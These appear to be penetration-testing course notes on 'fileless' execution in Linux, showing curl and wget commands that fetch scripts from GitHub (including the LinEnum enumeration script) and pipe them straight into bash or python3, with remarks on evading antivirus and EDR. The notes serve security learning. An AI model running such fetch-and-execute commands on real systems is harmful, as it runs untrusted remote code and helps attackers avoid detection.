search

πŸ’£ Fileless Attacks in Linux – Execute Directly

In Linux, because of the magic of pipes (|), you can execute scripts without saving them to disk first! 😱 This is called a fileless attack – and it's super sneaky. πŸ‘€

πŸ” Note: Some techniques (like using mkfifo) might still touch the disk temporarily. But piping directly into an interpreter (like bash or python3) is often fileless in practice.

hashtag
πŸŒ€ Fileless Execution with curl

Let’s take our old friend curl and run a script straight from the web πŸ‘‡

z3tssu@htb[/htb]$ curl https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh | bash

hashtag
What this does:

  • Downloads the LinEnum.sh script from GitHub

  • Instead of saving it, it pipes it directly into bash for execution

πŸ•΅οΈβ€β™‚οΈ No file written. No trace left (unless someone’s logging stdout)!

hashtag
🧲 Fileless Execution with wget

Here’s the same idea, but using wget with a little trick using -qO-:

z3tssu@htb[/htb]$ wget -qO- https://raw.githubusercontent.com/juliourena/plaintext/master/Scripts/helloworld.py | python3

hashtag
πŸŽ‰ Output:

πŸ“Œ What’s happening here:

  • -q = quiet mode (no download info clutter)

  • -O- = send output to stdout instead of saving to a file

  • | python3 = pipe that script straight into the Python interpreter 🐍

hashtag
⚠️ Why This Matters (and Why It's Dangerous)

Fileless attacks are a red flag for incident responders 🚨 because:

  • No files = harder to detect

  • No disk artifacts = bypass some traditional AV/EDR solutions

  • Great for in-memory execution or living-off-the-land (LOLBin) tactics

Previous🌐 Web Downloads with Wget and cURLNext🐚 Download with Bash using /dev/tcp

Last updated